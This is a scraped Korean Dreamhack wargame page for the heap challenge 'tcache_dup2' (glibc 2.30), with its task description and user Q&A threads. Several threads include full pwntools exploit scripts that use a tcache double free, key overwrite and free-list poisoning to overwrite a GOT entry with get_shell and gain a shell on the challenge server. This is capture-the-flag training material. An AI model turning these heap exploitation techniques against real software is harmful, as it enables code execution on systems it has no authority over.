LEVEL 2

tcache_dup2

pwnable
1926
949
2020.06.19. 16:32:27
로그인 하고 문제 풀기
  • 문제 정보
  • 풀이 78
  • 난이도 투표 110
  • 질문 16
  • 최근 풀이자 949
  • 댓글 41

문제 설명

Description

이 문제는 서버에서 작동하고 있는 서비스(tcache_dup2)의 바이너리와 소스 코드가 주어집니다.
취약점을 익스플로잇해 셸을 획득한 후, "flag" 파일을 읽으세요.
"flag" 파일의 내용을 워게임 사이트에 인증하면 점수를 획득할 수 있습니다.
플래그의 형식은 DH{...} 입니다.

Environment
Ubuntu 19.10
Arch:     amd64-64-little
RELRO:    Partial RELRO
Stack:    No canary found
NX:       NX enabled
PIE:      No PIE (0x400000)
Reference

Heap Allocator2

Chall Updates

2023.04.28: Dockerfile이 제공됩니다.

난이도 투표 110

질문 16

문제 풀이에 어려움이 있으신가요?
커뮤니티에서 문제에 대한 질문하고 답변 얻기
chunk 할당을 2번 해야하는 이유
문제를 풀다가 궁금한 점이 있어서 질문 남깁니다. 제가 처음에 작성했던 exploit 코드는 아래와 같습니다. from pwn import * #context.log_level = 'debug' p = remote("host3.dreamhack.games", 22465) e = ELF("./tcache_dup2") def create(size, data): p.sendlineafter(">", str(1)) p.sendlineafter("Size: ", str(size)) p.sendafter("Data: ", data) def modify(idx, size, data): p.sendlineafter(">", str(2)) p.sendlineafter("idx: ", str(idx)) p.sendlineafter("Size: ", str(size)) p.sendafter("Data: ", data) def delete(idx): p.sendlineafter(">", str(3)) p.sendlineafter("idx: ", str(idx)) create(48, b"a"*0x8) delete(0) modify(0, 9, b"\x00"*0x8 + b"\xaa") delete(0) puts_got = e.got['puts'] get_shell = e.symbols['get_shell'] create(48, p64(puts_got)) create(48, b"a"*0x8) create(48, p64(get_shell)) p.interactive() 그런데 이렇게 해도 안풀려서 혹시나 하는 마음에 chunk를 2개 할당한 뒤 뒤에 할당한 chunk를 DFB로 해보았더니 exploit이 되더군요...코드는 아래와 같습니다. create(48, b"a"*0x8) create(48, b"b"*0x8) delete(0) delete(1) modify(1, 9, b"\x00"*0x8 + b"\xaa") delete(1) puts_got = e.got['puts'] get_shell = e.symbols['get_shell'] create(48, p64(puts_got)) create(48, b"a"*0x8) create(48, p64(get_shell)) p.interactive() 이렇게 chunk를 2개 할당해야 하는 이유가 무엇인지 알고싶습니다.
avatar green_monster
답변 1
추천 0
1년 전
printf, read?
문제는 해결했습니다. 하지만 got overwrite을 해줄때 처음에 printf나 read의 got를 overwrite해주려고 해보았는데 안되고 다른 함수의 got를 overwrite해서서 해결하게 되었습니다. 근데 printf,read의 got를 overwrite했을 땐 왜 안되는지 잘 모르겠는데 그 이유에 대해서 고수분들께서 도와주셨으면 합니다. ㅎㅎㅎ
avatar FisMA
답변 3
추천 0
5년 전
과정 질문
`create(0x10, b'AAAA') create(0x10, b'AAAA') delete(0) delete(1) modify(1, 0x10, b'BBBBBBBBB') delete(1) create(0x10, p64(printf_got)) create(0x10, b'CCCC') create(0x10, p64(get_shell)) ` A - A A - A - B A - A -> printf_got A - printf_got A - get_shell 해당 순서로 생각했는데 어떤 부분이 틀린건가요?
han76
답변 1
추천 0
2년 전
환경 구성
문제의 환경을 구성하는 방법을 잘 모르겠습니다. 문제에서 Dockerfile을 제공하는데, 이것을 어떻게 빌드해야 할까요? 이전 문제들에서 18.04를 위해 제공했던 build.sh에서 이미지 이름과 컨테이너 이름만 수정해서 사용하려고 하는데 자꾸 오류가 발생하네요. => => # Ign:1 http://old-releases.ubuntu.com/ubuntu eoan-updates/main amd64 libc6 amd64 2.30-0ubuntu2.2 => => # Err:2 http://old-releases.ubuntu.com/ubuntu eoan/main amd64 liblocale-gettext-perl amd64 1.07-3build3 => => # Temporary failure resolving 'old-releases.ubuntu.com' 그리고 주어진 도커파일에는 vim이나 pwntool 등 필요한 패키지들이 포함되어있지 않은데 따로 추가해줘야하는 건가요?? 문제를 풀 때 도커 컨테이너를 활용해서 환경을 구성하는 방법을 알려주시면 좋겠습니다! 또는 이 방식이 아니더라도 어떻게 구성하시는지 조금 자세히 설명해주시면 감사하겠습니다!
밉찬
답변 2
추천 0
2년 전
도커 파일 빌드 관련
sudo docker build . -t test 해당 명령어로 빌드하면 ADD failed: file not found in build context or excluded by .dockerignore: stat flag: file does not exist 이런 오류가 뜨는데 해결법 아시는 분 있으실까여.. 도커 파일 처음 빌드해봅니다
avatar mooji
답변 2
추천 0
2년 전
tcache_dup_key값??
modify_heap()부분에서 힙의 Data에 채워주는 dummy값의 수를 줄여주면 익스플로잇이 안되는데 왜 그런건가요?? 예를 들어서 ''' Modify(1,10,"A"*10) ''' 이렇게 진행했는데 "A"*10일 때는 익스플로잇이 성공적으로 진행됐지만 "A"의 수가 9개 이하일 떄는 익스플로잇이 진행되지 않습니다. 이유 아시는 고수분 답변 남겨주십쇼 아마 key값과 상관있을것 같은데 정확한 이유 아시는분 있나요?? 제가 참고한 블로그는 https://blog.naver.com/apple8718/memo/222251479607 입니다.
avatar sangjun
답변 1
추천 0
4년 전
tcache key값 덮기
typedef struct tcache_entry { struct tcache_entry *next; /* This field exists to detect double frees. */ struct tcache_perthread_struct *key; } tcache_entry; 64bit에서 key의 위치는 9번째 바이트부터인데, tcache poisoning 강의에서 8바이트를 덮어 키 값을 변조하라고 나와 있습니다. 또한 제가 익스플로잇을 짤 때도 dummy를 7바이트로 설정하면 공격이 실패했으나, 8바이트 이상으로 설정하면 공격이 성공했습니다. 다른 분이 작성하신 글에는 뒤에 널 바이트가 자동으로 삽입되어 9번째 바이트가 널로 바뀌기 때문에 변조가 가능한 것 같다고 나와 있습니다. 그런데 문제에서 주어진 c파일의 modify 부분의 코드를 보면 다음과 같습니다. printf("Data: "); read(0, ptr[idx], size); 이를 보고 혹시 read 함수가 데이터를 읽으면 뒤에 자동으로 널 문자를 저장해주는지 찾아봤는데, 그런 기능은 없는 것 같습니다. 혹시 왜 dummy를 8바이트로 설정해도 key값이 변조되는지 아시는 분 있을까요?
gardenia
답변 2
추천 0
2년 전
tc_idx 질문
안녕하세요. 이번 문제를 풀면서 tc_idx와 관련하여 궁금증이 생겨서 이렇게 질문을 남깁니다. tcache_dup와 Tcache Poisoning 워게임을 풀 때는 tc_idx를 신경써주지 않았는데, 해당 문제에서만 tc_idx를 신경써줘야 하는 이유가 Ubuntu 버전 차이인가요 ? 아니면 glibc 차이인가요 ? tc_idx를 쓰지 않는 문제는 도커 파일이 Ubuntu 18.04 libc-2.27.so이고, 이번 문제는 Ubuntu 19.10, libc-2.30.so 입니다. 그리고 tc_idx가 0일 때, malloc을 하면 어디서 청크를 할당받나요 ?
avatar ro
답변 1
추천 0
1년 전
fd 값 질문
from pwn import * p = process("./tcache_dup2") e = ELF("./tcache_dup2") def create_heap(size,data): p.sendlineafter("> ",'1') p.sendlineafter("Size: ",str(size)) p.sendafter("Data: ",data) def modify_heap(idx,size,data): p.sendlineafter("> ",'2') p.sendlineafter("idx: ",str(idx)) p.sendlineafter("Size: ",str(size)) p.sendafter("Data: ",data) def delete_heap(idx): p.sendlineafter("> ",'3') p.sendlineafter("idx: ",str(idx)) get_shell = 0x401530 free = e.got['free'] create_heap(0x30,"aaaa") create_heap(0x30,"bbbb") delete_heap(0) delete_heap(1) modify_heap(1,0xa,b"A"*8+b"\x00") delete_heap(1) create_heap(0x30,p64(free)) create_heap(0x30,b"B"*8) create_heap(0x30,p64(get_shell)) delete_heap(1) p.interactive() tc_idx값을 3으로 만들기 위해 두번 동일한 크기의 chunk를 할당하고 free한후 하나의 chunk는 double free를 발생시켜 fd에 free_got 주소를 입력했습니다. 그리고 저는 다음번 할당때 double free에 사용했던 chunk가 할당되고 그다음에 fd값에 입력했던 free_got 주소로 할당될 거라고 생각했었는데 create_heap(0x30,p64(get_shell)) 이 부분에서 unaligned tcache chunk detected 라는 문구와 함께 종료되었는데 어떤 부분에서 잘못됐는지 잘 모르겠습니다ㅠ
avatar Soon
답변 1
추천 0
3년 전
modify_heap??
Double free를 쓰지 않고 청크를 1번만 Free한 다음에 Modify_heap으로 next 포인터를 got 주소로 변경후 익스플로잇을 시도해봤습니다. 그런데 우분투 18.04 버전에서는 익스플로잇이 성공적으로 됐지만 우분투 20.04 버전이랑 리모트에서는 tcachebins 에 got 주소가 들어가긴 했지만 막상 malloc을 하면 tcachebins에 들어간 got 주소가 아니라 heap에 할당이 됩니다. 어떤 이유로 이런 결과가 나오는지 알려주신다면 감사하겠습니다 ㅠㅠ
d05004
답변 2
추천 0
4년 전
LEVEL 2

tcache_dup2

pwnable
1926
949
2020.06.19. 16:32:27
로그인 하고 문제 풀기

출제자 정보

avatar
Dreamhack
대표 업적 없음
Dreamhack official account

First Blood!

avatar
호빵맨
워게임: 50
출제된 지 2시간 만에 풀이 완료!

최근 풀이자 949

avatar
verybigsilver
시스템 해킹 중급자
19시간 전
호이52
대표 업적 없음
2일 전
zz!!
대표 업적 없음
2일 전
faust64
대표 업적 없음
3일 전
jaym
대표 업적 없음
4일 전
avatar
Helix
시스템 해킹 중급자
5일 전
nksowper
대표 업적 없음
5일 전
avatar
foundme
대표 업적 없음
6일 전
nanowater
대표 업적 없음
7일 전
avatar
r3con
대표 업적 없음
7일 전

댓글 41

avatar
Helix
시스템 해킹 중급자
5일 전
힙이 ㄹㅇ환경 맞추는게 개빡이네 죄다 리모트로 해야되노
Ma_Mu0228
묘목
4개월 전
tcache poison의 원리만 제대로 이해하시면, 2.30우회는 쉽습니다.
PUPU
시스템 해킹 초심자
5개월 전
더블프리 아니여도 풀리긴해요
avatar
Rootsquare
바탈리온
8개월 전
해제 후 사용(Use After Free)의 위험성
avatar
피곤해요
대표 업적 없음
11개월 전
ㅜ.ㅜ
avatar
사용자
소통요정
2년 전
좋은 문제입니다~
avatar
is07king
워게임: 1
2년 전
નુલુંગ 어려워
avatar
Rosieblue
워게임 고인물
2년 전
count때문에 삽질했네요... 꼭 유의하기 ㅜ
avatar
Newb1e
워게임 풀이: 1
2년 전
강의대로 가지 않고(Double Free를 일으키지 않고) 문제를 풀 수도 있습니다.
avatar
Sunja
강의 수강: 10
3년 전
heap 을 자세히 알게 된 문제..